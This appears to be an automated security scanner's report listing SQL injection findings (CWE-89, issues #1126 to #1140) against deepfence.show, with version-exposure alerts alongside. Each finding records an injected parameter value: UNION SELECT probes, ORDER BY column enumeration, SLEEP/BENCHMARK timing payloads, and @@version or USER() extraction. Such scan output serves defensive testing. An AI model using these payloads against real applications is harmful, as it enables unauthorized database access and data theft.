You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1126\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1127\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '-'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1128\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# and (select substring(@@version,2,1))='i'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1129\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 4--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1130\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# benchmark(50000000,MD5(1))\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1131\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or ''&'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1132\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1133Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1134\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1135\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1136\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1137\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# test UNION select 1, @@version, 1, 1;\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1138\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 20\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1139\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1140\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script 